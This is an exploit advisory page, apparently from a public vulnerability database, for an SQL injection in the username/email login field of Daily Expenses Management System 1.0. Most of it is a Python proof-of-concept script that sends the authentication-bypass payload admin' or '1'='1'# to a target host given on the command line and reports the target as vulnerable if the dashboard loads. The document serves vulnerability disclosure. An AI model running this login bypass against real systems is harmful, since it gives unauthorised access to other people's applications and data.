Daily Expenses Management System 1.0 username SQL Injection

2020.08.04
Credit: Daniel Ortiz
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: Daily Expenses Management System 1.0 - 'username' SQL Injection # Exploit Author: Daniel Ortiz # Date: 2020-08-01 # Vendor Homepage: https://www.sourcecodester.com/php/14372/daily-tracker-system-phpmysql.html # Tested on: XAMPP Version 5.6.40 / Windows 10 # Software Link: https://www.sourcecodester.com/php/14372/daily-tracker-system-phpmysql.html import sys import requests import urllib3 import re import time urllib3.disable_warnings(urllib3.exceptions.InsecurePlatformWarning) def make_request(url, payload): p = {"http":"127.0.0.1:8080", "https": "127.0.0.1:8080"} s = requests.Session() r = s.post(url, data=payload, proxies=p) return r if __name__ == '__main__': if len(sys.argv) != 2: print("[*] Daily Expenses Management System | username SQL injection") print("[*] usage: %s TARGET" % sys.argv[0]) print("[*] e.g: %s 192.168.0.10" % sys.argv[0]) sys.exit(-1) TARGET = sys.argv[1] LOGIN_FORM = "http://%s/dets/" % TARGET # Step 1 - Bypass login form url = LOGIN_FORM p1 = {'email': "admin' or '1'='1'#", 'password': 'admin', 'login': 'login'} r = make_request(url, p1) print("[+] Endpoint: %s") % LOGIN_FORM print("[+] Making requests with payload: %s") % p1 if re.findall('Dashboard', r.text): print("[+] Target vulnerable") else: print("[-] Error !!!")


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top